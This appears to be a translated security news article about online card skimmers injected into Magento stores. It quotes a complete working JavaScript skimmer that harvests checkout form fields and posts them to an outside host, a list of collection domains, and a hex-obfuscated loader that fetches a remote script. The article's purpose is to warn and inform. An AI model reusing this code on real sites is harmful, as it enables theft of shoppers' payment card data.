Online skimming is a relatively new form of bank card fraud. The essence is clear from the name. If a regular skimmer is an overlay on an ATM card reader that makes a magnetic stripe dump, then an online skimmer is a software bookmark on the online store's server that passively intercepts payment data when the user enters it into text fields in the browser. Until now, carders have focused mainly on transaction servers where encryption is used, but in this case, information is removed even before encryption. Then information about payment cards is sold on underground forums: usually, an unauthorized person can make payments using these cards without any problems.
Security experts at Nightly Secure say that online skimming has been rapidly gaining popularity recently. For the first time, the spread of such fraud was discussed in 2015. As of November 2015, 3,501 stores with JS bookmarks on the server were found out of the list of 255,000 online stores. During the year, their number increased by 69%.
Sample javascript bookmark for intercepting payment data looks like this (in this case, the information is sent to http://ownsafety.org/opp.php):
Code:
<script>// <![CDATA[
// whitespace added for readability --wdg
function j(e) {
var t = "; " + document.cookie,
o = t.split("; " + e + "=");
return 2 == o.length ? o.pop().split(";").shift() : void 0
}
j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) {
e("button").on("click", function() {
var t = "",
o = "post",
n = window.location;
if (new RegExp("onepage|checkout").test(n)) {
for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) {
var a = c[i].name;
"" == a && (a = i), t += a + "=" + c[i].value + "&"
}
if (t) {
var l = new RegExp("[0-9]{13,16}"),
u = new XMLHttpRequest;
u.open(o, e("
<div />").html("http://ownsafety.org/opp.php").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear()
}
}
})
});
// ]]></script>Last year, researchers compiled a list of the most frequently used addresses for data collection:
Code:
1860 https://ownsafety.org/opp.php
390 http://ownsafety.org/opp.php
309 https://useagleslogistics.com/gates/jquery.php
100 https://redwiggler.org/wp-content/themes/jquerys.php
70 https://clickvisits.biz/xrc.php
28 https://gamula.eu/jquery.php
23 https://gamula.ru/order.php
22 https://news-daily.me/gt/
20 https://antaras.xyz/jquery.php
17 https://clicksale.xyz/xrc.php
10 https://ausfunken.com/service/css.php
9 http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php
5 https://redwiggler.org/wp-content/themes/jquery.php
1 /js/index.php
1 /js/am/extensions/sitemap_api.php
1 https://infopromo.biz/lib/jquery.php
1 https://google-adwords-website.biz/gates/jquery.php
1 https://bandagesplus.com/order.php
1 http://nearart.com/order.php
1 http://happysocks.in/jquery.plIn almost all cases, small versions of the same code are used.
Such a bookmark is quite difficult to detect on the server. The code is loaded from the CMS and works in the browser. On the mentioned three and a half thousand sites last year, it worked for several months, on many-six months or more.
Experts believe that a large number of infected servers indicates a high degree of automation of the attack. This is done not by some script kiddies, but by good professionals. Probably from Russia.
Vulnerabilities in the software of online stores are used to embed bookmarks. First of all, this is a vulnerable Magento Commerce software. It is the easiest way to implement CMS code through it, although in fact this code can work in any online store that does not necessarily use Magento. You can check the online store for vulnerabilities on the site MageReports.com.
Although the problem was raised a year ago, but over the past year it has not disappeared anywhere. Even worse, the number of infected online stores has increased by one and a half times. In March 2016, the number of stores with skimmers increased from 3,501 to 4,476, and in September 2016 — to 5,925.
The guys from Nightly Secure published a list of all infected stores to warn customers — and notify the administrators of these stores about the vulnerability. After all, among them were quite popular sites, including branches of car manufacturers (Audi ZA), government organizations (NRSC, Malaysia), sites of popular musicians (Bjork), and non-profit organizations (Science Museum, Washington Cathedral).
If a year ago almost all stores used small modifications of the same online skimmer, now researchers have already found 9 separate versions of the script belonging to 3 different families (source code on Github).
Attackers have become smarter and now use multi-level code obfuscation, which is not so easy to parse. For example, the script can be masked like this:
Real malware code:
Code:
<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');//4079</script>The authors also improved the mechanism for intercepting payment card data. Previously, the malware simply intercepted pages with a string checkoutin the URL, but now it already recognizes the popular payment plugins Firecheckout, Onestepcheckout, and Paypal.
Specialists from Nightly Secure tried to contact a number of stores (about 30) and inform them about the installed skimmer, but most of the stores did not receive a response, and others were surprisingly careless. One of them said that this is not his problem, because the payments are processed by a third-party company. The second one said that this is just a Javascript error that does not pose a threat. The third person said that there could be no danger at all, because "the store operates over HTTPS". The author submitted a list of stores with skimmers to Google for being blacklisted by Chrome Safe Browsing.
A list of all stores with skimmers was originally published on Github. And that's where the fun started. Soon, Github removed the publication of the results of the study of online stores from its site without warning.
Apparently, Github carried out censorship according to the standard procedure, having received a DMCA request from one of the stores. Of course, it is unpleasant for the store when they find a vulnerability and tell the whole world.
Yesterday, the author moved the results of the online store security study to Gitlab hosting. Today, the page at this address returns a 404 error. A few hours ago, the author received an email from Gitlab explaining the reasons for deletion. According to the administration, the publication of the list of vulnerable stores is considered as a "blatant case" that cannot be resolved. Therefore, the list was deleted (UPD: access was restored, the director of Gitlab apologized).
Copy of the list in the web archive
Copy on Pastebin
Note that the list of stores with online skimmers installed lists 44 domains in the. RU zone.
Let's hope that the administrators of these stores will quickly install the version of Magento with the latest patches and compensate for losses to customers whose copies of payment cards were leaked to the black market.
